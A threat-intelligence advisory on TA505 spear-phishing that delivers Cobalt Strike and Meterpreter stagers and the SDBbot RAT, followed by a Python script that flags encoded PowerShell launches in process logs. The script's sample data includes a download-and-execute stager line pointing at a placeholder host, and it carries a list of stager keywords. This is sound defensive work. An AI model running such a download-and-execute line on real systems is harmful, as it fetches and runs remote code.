This report covers a new series of spear-phishing emails from a well-known and dangerous threat actor tracked as Hive0065 or TA505. Several of these phishing emails carry a macro-laden Word document that is delivered through a fake Office 365 link.
Based on the research we have seen, the threat actor packages lightweight, deployable builds (stagers) of two well-known post-exploitation tools, Cobalt Strike and Meterpreter. These are delivered as DLL files that the macros embedded in the spear-phishing attachments download onto the host. The modular design of those DLLs lets the actor deploy an executable whose job is to open a reverse shell from the infected host.
The reverse shell is then used to download a remote access trojan called SDBbot onto the infected host. SDBbot is designed to maintain command and control connections with the threat actor's infrastructure and runs inside the built-in Windows process winlogon.exe. The trojan checks whether it is running on Windows 7 or Windows 10. Commands in its command and control traffic are identified by DWORD values.
When the user opens the spear-phishing attachment, it displays a fake Microsoft login window, which lets the attacker harvest the user's credentials for later use. Those credentials are held for later use, and the SDBbot RAT also injects into the winlogon.exe system process.
These attacks could result in the loss of sensitive credentials and a persistent, widespread malware infection. The threat actor is well known for infecting systems for financial gain.
We strongly encourage you to block the indicators of compromise listed in the article linked below. Consider implementing a user awareness training program across the organization. It is also prudent to review the PowerShell logging you collect (script block logging, event ID 4104, and process creation events that record the full command line) so you can alert on encoded scripts, that is, launches that use the -EncodedCommand switch or one of its short forms, being run in your environment.
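As an added illustration of the log review suggested above (example code written for this edit, not taken from the Avertium or IBM reports), the script below triages process-creation events for encoded PowerShell launches: it recognises every short form of -EncodedCommand, decodes the UTF-16LE/base64 payload, checks both the outer command line and the decoded script for common stager strings, and weights a launch more heavily when an Office application is the parent process or the payload will not decode (as happens when a log pipeline truncates it). The log line format, host names, and sample command lines are constructed for the example; the token list is a generic starting point, not a set of signatures from the report.

```python
import base64
import re
from typing import Optional

# Office applications that should rarely spawn PowerShell directly; in a
# macro-driven download chain one of these is the parent process.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Generic stager indicators to look for in the command line and in the
# decoded script. These are not signatures taken from the report.
SUSPICIOUS_TOKENS = (
    "downloadstring", "downloadfile", "net.webclient", "invoke-expression",
    "iex", "frombase64string", "rundll32", "regsvr32", "-w hidden",
)

# powershell.exe accepts any prefix of -EncodedCommand, so "-e", "-ec",
# "-enc" and "-EncodedCommand" are all equivalent. Build an alternation of
# every prefix, longest first, so no spelling slips past the regex.
_PREFIXES = "|".join("encodedcommand"[:n] for n in range(14, 0, -1))
ENCODED_FLAG = re.compile(
    r"(?<!\S)-(?:%s)\s+([A-Za-z0-9+/=]+)" % _PREFIXES, re.IGNORECASE
)


def encode_command(script: str) -> str:
    """Build the -EncodedCommand argument as powershell.exe expects it:
    base64 over the UTF-16LE bytes of the script (used to construct samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str) -> Optional[str]:
    """Reverse encode_command; return None for truncated or corrupt blobs
    instead of raising, since log truncation is common."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_event(line: str) -> dict:
    """Parse the constructed 'Key=Value ... CommandLine=<rest>' line format."""
    head, _, cmdline = line.partition("CommandLine=")
    fields = dict(tok.split("=", 1) for tok in head.split())
    fields["CommandLine"] = cmdline.strip()
    return fields


def analyze_event(event: dict) -> Optional[dict]:
    """Score one process-creation event; None if it is not a PowerShell launch."""
    cmdline = event.get("CommandLine", "")
    if "powershell" not in cmdline.lower():
        return None
    parent = event.get("ParentProcess", "").lower()
    finding = {"host": event.get("Host"), "parent": parent,
               "office_parent": parent in OFFICE_PARENTS,
               "encoded": False, "decoded": None, "hits": [], "score": 0}
    outer = cmdline
    m = ENCODED_FLAG.search(cmdline)
    if m:
        finding["encoded"] = True
        finding["decoded"] = decode_command(m.group(1))
        # Drop the base64 blob itself so random letters inside it cannot
        # produce false token hits.
        outer = cmdline[:m.start(1)] + cmdline[m.end(1):]
    haystack = (outer + " " + (finding["decoded"] or "")).lower()
    finding["hits"] = [t for t in SUSPICIOUS_TOKENS if t in haystack]
    # An encoded launch alone is worth a look; an Office parent, stager
    # tokens, or a payload that will not decode push it toward an alert.
    score = int(finding["encoded"]) + 2 * int(finding["office_parent"])
    score += len(finding["hits"])
    if finding["encoded"] and finding["decoded"] is None:
        score += 1
    finding["score"] = score
    return finding


def triage(lines, min_score: int = 1) -> list:
    """Return findings at or above min_score, highest score first."""
    findings = [analyze_event(parse_event(line)) for line in lines]
    kept = [f for f in findings if f and f["score"] >= min_score]
    return sorted(kept, key=lambda f: f["score"], reverse=True)


# Constructed sample events (hypothetical hosts and paths; not from the report).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
SAMPLE_LOG = [
    "EventID=4688 Host=WS01 ParentProcess=explorer.exe CommandLine=powershell.exe -NoProfile",
    "EventID=4688 Host=WS01 ParentProcess=WINWORD.EXE CommandLine=powershell.exe -nop -w hidden -enc "
    + encode_command(STAGER),
    "EventID=4688 Host=WS02 ParentProcess=cmd.exe CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\backup.ps1",
    # Same launch with the blob cut short, as a truncating log pipeline would leave it.
    "EventID=4688 Host=WS03 ParentProcess=WINWORD.EXE CommandLine=powershell.exe -EncodedCommand "
    + encode_command(STAGER)[:-3],
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["score"], f["host"], f["parent"], f["hits"],
              (f["decoded"] or "<undecodable>")[:60])
```

Run against the constructed sample, the Word-spawned launch with a decodable download-and-execute stager scores highest, the truncated Word-spawned launch still surfaces because an undecodable payload is itself a reason to look, and the two administrative launches (interactive, and a scheduled script run with -ExecutionPolicy Bypass, which the prefix regex deliberately does not mistake for -EncodedCommand) drop out at the default threshold.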
Related Reading: Top 5 Warning Signs When Opening Email
Supporting Documentation:
Security Intelligence Article: https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/
Note: The Avertium Threat Report analyzes one current threat that has been shared by threat intelligence networks across the globe. Used internally by the Avertium CyberOps Team, this report outlines a "top-of-mind" threat and how it ought to be addressed. This analysis is based on the latest data available at the time of writing.